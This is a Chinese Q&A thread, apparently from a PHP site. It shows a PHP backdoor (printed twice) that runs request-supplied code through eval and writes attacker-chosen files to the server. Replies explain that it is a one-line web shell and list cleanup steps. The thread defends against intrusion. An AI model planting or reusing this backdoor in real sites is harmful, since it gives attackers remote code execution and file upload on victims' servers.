<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){
$vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
}
if(isset($_REQUEST['ztkb'])) {
$lzoki = $_REQUEST['hyrvkum'];
$xhwpemsz = $_REQUEST['ztkb'];
$oarnubp = fopen($xhwpemsz, 'w');
$npty = fwrite($oarnubp, $lzoki);
fclose($oarnubp);
echo $npty; exit();
} ?><?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){
$vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
}
if(isset($_REQUEST['ztkb'])) {
$lzoki = $_REQUEST['hyrvkum'];
$xhwpemsz = $_REQUEST['ztkb'];
$oarnubp = fopen($xhwpemsz, 'w');
$npty = fwrite($oarnubp, $lzoki);
fclose($oarnubp);
echo $npty; exit();
} ?>
你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。
第二段是用来上传文件,讲攻击者自己的php文件上传至你的服务器。
请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。
这是一句话木马。
这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!
网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限
PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!
C++高性能并发应用_C++如何开发性能关键应用
Java AI集成Deep Java Library_Java怎么集成AI模型部署
Golang后端API开发_Golang如何高效开发后端和API
Python异步并发改进_Python异步编程有哪些新改进
C++系统编程内存管理_C++系统编程怎么与Rust竞争内存安全
Java GraalVM原生镜像构建_Java怎么用GraalVM构建高效原生镜像
Python FastAPI异步API开发_Python怎么用FastAPI构建异步API
C++现代C++20/23/26特性_现代C++有哪些新标准特性如modules和coroutines
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号